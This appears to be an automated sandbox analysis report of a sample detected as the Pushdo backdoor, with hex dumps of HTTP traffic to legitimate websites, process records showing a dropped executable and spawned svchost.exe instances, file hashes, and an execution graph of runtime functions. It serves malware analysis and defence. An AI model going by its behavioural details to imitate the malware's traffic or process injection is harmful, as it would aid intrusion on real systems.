                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17137INData Raw: 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65
                                                                                                                                                                                                                                                                          Data Ascii: ome" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage cente
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17138INData Raw: 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69
                                                                                                                                                                                                                                                                          Data Ascii: age center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17139INData Raw: 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20
                                                                                                                                                                                                                                                                          Data Ascii: tainer"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17141INData Raw: 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70
                                                                                                                                                                                                                                                                          Data Ascii: as <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17142INData Raw: 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63
                                                                                                                                                                                                                                                                          Data Ascii: Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contac
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17143INData Raw: 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63
                                                                                                                                                                                                                                                                          Data Ascii: d="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17145INData Raw: 34 36 32 0d 0a 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67
                                                                                                                                                                                                                                                                          Data Ascii: 462ode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script lang
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17146INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          99192.168.2.61532575.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17146OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17146INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:00 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17146INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:08:05:29
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          Imagebase:0x370000
                                                                                                                                                                                                                                                                          File size:647'168 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2CCA5C1B1F00170BD750694D9511015B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.813790017.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:08:05:59
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                                                                                                                                          File size:647'168 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2CCA5C1B1F00170BD750694D9511015B
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                          • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:08:06:07
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                                                                                                                                          File size:647'168 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2CCA5C1B1F00170BD750694D9511015B
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:08:06:22
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:08:07:01
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:08:07:03
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                          Start time:08:07:04
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:08:07:04
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:08:07:05
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:08:07:11
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:08:07:23
                                                                                                                                                                                                                                                                          Start date:05/07/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          Imagebase:0x1290000
                                                                                                                                                                                                                                                                          File size:44'520 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:5.3%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:7.5%
                                                                                                                                                                                                                                                                            Total number of Nodes:1187
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:19
                                                                                                                                                                                                                                                                            execution_graph 9138 379d3b 9139 379d46 9138->9139 9140 379d56 9138->9140 9144 379d5c 9139->9144 9143 37a8fb _free 20 API calls 9143->9140 9145 379d6f 9144->9145 9146 379d75 9144->9146 9147 37a8fb _free 20 API calls 9145->9147 9148 37a8fb _free 20 API calls 9146->9148 9147->9146 9149 379d81 9148->9149 9150 37a8fb _free 20 API calls 9149->9150 9151 379d8c 9150->9151 9152 37a8fb _free 20 API calls 9151->9152 9153 379d97 9152->9153 9154 37a8fb _free 20 API calls 9153->9154 9155 379da2 9154->9155 9156 37a8fb _free 20 API calls 9155->9156 9157 379dad 9156->9157 9158 37a8fb _free 20 API calls 9157->9158 9159 379db8 9158->9159 9160 37a8fb _free 20 API calls 9159->9160 9161 379dc3 9160->9161 9162 37a8fb _free 20 API calls 9161->9162 9163 379dce 9162->9163 9164 37a8fb _free 20 API calls 9163->9164 9165 379ddc 9164->9165 9170 379c22 9165->9170 9176 379b2e 9170->9176 9172 379c46 9173 379c72 9172->9173 9189 379b8f 9173->9189 9175 379c96 9175->9143 9177 379b3a ___BuildCatchObject 9176->9177 9184 37b1a4 EnterCriticalSection 9177->9184 9179 379b6e 9185 379b83 9179->9185 9181 379b7b ___BuildCatchObject 9181->9172 9182 379b44 9182->9179 9183 37a8fb _free 20 API calls 9182->9183 9183->9179 9184->9182 9188 37b1ec LeaveCriticalSection 9185->9188 9187 379b8d 9187->9181 9188->9187 9190 379b9b ___BuildCatchObject 9189->9190 9197 37b1a4 EnterCriticalSection 9190->9197 9192 379ba5 9193 379e05 _abort 20 API calls 9192->9193 9194 379bb8 9193->9194 9198 379bce 9194->9198 9196 379bc6 ___BuildCatchObject 9196->9175 9197->9192 9201 37b1ec LeaveCriticalSection 9198->9201 9200 379bd8 9200->9196 9201->9200 8994 37dcba 8999 37e101 SetUnhandledExceptionFilter 8994->8999 8996 37dcbf pre_c_initialization 9000 37c908 8996->9000 8998 37dcca 8999->8996 9001 37c914 9000->9001 9002 37c92e 9000->9002 9001->9002 9003 379a46 __dosmaperr 20 API calls 9001->9003 9002->8998 9004 37c91e 9003->9004 9005 37998a ___std_exception_copy 26 API calls 9004->9005 9006 37c929 9005->9006 9006->8998 9399 37ca3a 9402 37b6dd 9399->9402 9403 37b6e6 9402->9403 9404 37b6ef 9402->9404 9403->9404 9405 37b5dc 52 API calls 9403->9405 9405->9404 9539 382b17 9549 383153 9539->9549 9543 382b24 9562 3832d4 9543->9562 9546 382b4e 9547 37a8fb _free 20 API calls 9546->9547 9548 382b59 9547->9548 9566 38315c 9549->9566 9551 382b1f 9552 383234 9551->9552 9553 383240 ___BuildCatchObject 9552->9553 9586 37b1a4 EnterCriticalSection 9553->9586 9555 3832b6 9600 3832cb 9555->9600 9557 38324b 9557->9555 9558 38328a DeleteCriticalSection 9557->9558 9587 38404c 9557->9587 9561 37a8fb _free 20 API calls 9558->9561 9559 3832c2 ___BuildCatchObject 9559->9543 9561->9557 9563 3832ea 9562->9563 9564 382b33 DeleteCriticalSection 9562->9564 9563->9564 9565 37a8fb _free 20 API calls 9563->9565 9564->9543 9564->9546 9565->9564 9567 383168 ___BuildCatchObject 9566->9567 9576 37b1a4 EnterCriticalSection 9567->9576 9569 38320b 9581 38322b 9569->9581 9572 383217 ___BuildCatchObject 9572->9551 9574 38310c 66 API calls 9575 383177 9574->9575 9575->9569 9575->9574 9577 382b63 EnterCriticalSection 9575->9577 9578 383201 9575->9578 9576->9575 9577->9575 9584 382b77 LeaveCriticalSection 9578->9584 9580 383209 9580->9575 9585 37b1ec LeaveCriticalSection 9581->9585 9583 383232 9583->9572 9584->9580 9585->9583 9586->9557 9588 384058 ___BuildCatchObject 9587->9588 9589 384069 9588->9589 9590 38407e 9588->9590 9591 379a46 __dosmaperr 20 API calls 9589->9591 9599 384079 ___BuildCatchObject 9590->9599 9603 382b63 EnterCriticalSection 9590->9603 9592 38406e 9591->9592 9594 37998a ___std_exception_copy 26 API calls 9592->9594 9594->9599 9595 38409a 9604 383fd6 9595->9604 9597 3840a5 9620 3840c2 9597->9620 9599->9557 9868 37b1ec LeaveCriticalSection 9600->9868 9602 3832d2 9602->9559 9603->9595 9605 383ff8 9604->9605 9606 383fe3 9604->9606 9612 383ff3 9605->9612 9623 3830a6 9605->9623 9607 379a46 __dosmaperr 20 API calls 9606->9607 9608 383fe8 9607->9608 9610 37998a ___std_exception_copy 26 API calls 9608->9610 9610->9612 9612->9597 9613 3832d4 20 API calls 9614 384014 9613->9614 9629 382a29 9614->9629 9616 38401a 9636 3844da 9616->9636 9619 37a8fb _free 20 API calls 9619->9612 9867 382b77 LeaveCriticalSection 9620->9867 9622 3840ca 9622->9599 9624 3830be 9623->9624 9628 3830ba 9623->9628 9625 382a29 26 API calls 9624->9625 9624->9628 9626 3830de 9625->9626 9651 3839d1 9626->9651 9628->9613 9630 382a4a 9629->9630 9631 382a35 9629->9631 9630->9616 9632 379a46 __dosmaperr 20 API calls 9631->9632 9633 382a3a 9632->9633 9634 37998a ___std_exception_copy 26 API calls 9633->9634 9635 382a45 9634->9635 9635->9616 9637 3844e9 9636->9637 9638 3844fe 9636->9638 9640 379a33 __dosmaperr 20 API calls 9637->9640 9639 384539 9638->9639 9643 384525 9638->9643 9641 379a33 __dosmaperr 20 API calls 9639->9641 9642 3844ee 9640->9642 9644 38453e 9641->9644 9645 379a46 __dosmaperr 20 API calls 9642->9645 9824 3844b2 9643->9824 9647 379a46 __dosmaperr 20 API calls 9644->9647 9648 384020 9645->9648 9649 384546 9647->9649 9648->9612 9648->9619 9650 37998a ___std_exception_copy 26 API calls 9649->9650 9650->9648 9652 3839dd 